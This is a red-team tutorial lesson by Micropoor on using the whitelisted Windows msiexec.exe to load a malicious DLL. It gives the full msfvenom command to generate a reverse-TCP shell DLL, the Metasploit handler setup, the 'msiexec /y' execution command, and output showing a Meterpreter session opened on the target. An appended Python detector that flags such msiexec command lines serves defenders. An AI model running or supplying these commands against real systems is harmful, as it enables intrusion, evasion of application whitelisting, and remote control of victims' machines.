# Lesson 86: Executing a payload through the whitelisted Msiexec, Season 8 supplement

**Note:** Drink plenty of hot water or cooled boiled water; your health comes first.

This supplement covers loading a local DLL.

**About Msiexec:**

Msiexec is part of Windows Installer. It installs Windows Installer packages (MSI) and usually shows up while Microsoft Update applies updates or while some software is being installed; it uses a fair amount of memory. It ships with Windows 2003, Windows 7 and other Windows releases.

**Note:** The directory containing Msiexec.exe is already in the system PATH environment variable, so the `msiexec` command is recognized from any location.

## Configuring the payload for the whitelisted Msiexec.exe:

**Note: x64 payload**

```bash
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 -f dll > Micropoor_rev_x64_53.dll
```

## Configuring msf on the attacking machine:

**Note: x64 payload**

```bash
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     53               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUCLwDNSFSVcJqT%2F62736d164fb64b1462810cfea7bd472c.jpg?generation=1551066078137975\&alt=media)

## Execution on the target machine:

```bash
msiexec /y C:\Users\John\Desktop\Micropoor_rev_x64_dll.dll
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUJ-VVU8n80Opb1%2Fb8cbb9334f2281d8cd8f70052c2a02a9.jpg?generation=1551066081360678\&alt=media)

```bash
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (206403 bytes) to 192.168.1.5
[*] Meterpreter session 26 opened (192.168.1.4:53 -> 192.168.1.5:11543) at 2019-01-20 09:45:51 -0500

meterpreter > getuid
Server username: John-PC\John
meterpreter > getpid
Current pid: 7672
meterpreter >
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZJxBUeQeKygC2p58c9%2F84fb0dd629aae878607221e385dfff34.jpg?generation=1551066050228853\&alt=media)
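From the defender's side, the behaviour above leaves a clear mark in process-creation telemetry: `msiexec.exe` started with the `/y` (DllRegisterServer) or `/z` (DllUnregisterServer) switch and a DLL path, here under a user profile. The following Python is an added example, not part of Micropoor's lesson, that flags such command lines and raises the severity when the DLL lives in a user-writable directory; the sample records, the tuple layout and the directory list are constructed assumptions.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

# msiexec /y <module> calls the DLL's DllRegisterServer export and /z calls
# DllUnregisterServer; both load the DLL into msiexec.exe. "/" or "-" prefix.
DLL_SWITCHES = {"y", "z"}
# Directories a standard user can write to (assumed list; tune per environment).
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata|public|downloads)\\", re.I)
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

@dataclass
class Finding:
    event_id: int
    switch: str
    dll_path: str
    severity: str

def inspect_msiexec(event_id: int, cmdline: str) -> Optional[Finding]:
    """Flag a process-creation command line where msiexec registers a DLL."""
    tokens = tokenize(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("msiexec", "msiexec.exe"):
        return None
    for i, tok in enumerate(tokens[1:], start=1):
        if len(tok) == 2 and tok[0] in "/-" and tok[1].lower() in DLL_SWITCHES:
            if i + 1 >= len(tokens):
                return None  # switch without a module path: msiexec just errors out
            dll = tokens[i + 1]
            severity = "high" if USER_WRITABLE.search(dll) else "medium"
            return Finding(event_id, tok[1].lower(), dll, severity)
    return None

# Constructed sample records in the shape of Security 4688 / Sysmon 1 command
# lines (not real telemetry); record 1 mirrors the command used on this page.
SAMPLE_EVENTS = [
    (1, r"msiexec /y C:\Users\John\Desktop\Micropoor_rev_x64_dll.dll"),
    (2, r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\John\Downloads\setup.msi" /qn'),
    (3, r'msiexec.exe /x "{PRODUCT-CODE-PLACEHOLDER}" /qn'),
    (4, r'msiexec.exe -Y "C:\Program Files\Vendor\helper.dll"'),
]

def triage(events) -> list:
    """Return a Finding for every event whose command line loads a DLL via msiexec."""
    return [f for f in (inspect_msiexec(i, c) for i, c in events) if f is not None]
```

Records 2 and 3 are ordinary package installs and are left alone; only the `/y` and `-Y` lines are reported, with the user-profile path rated high.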

> Micropoor
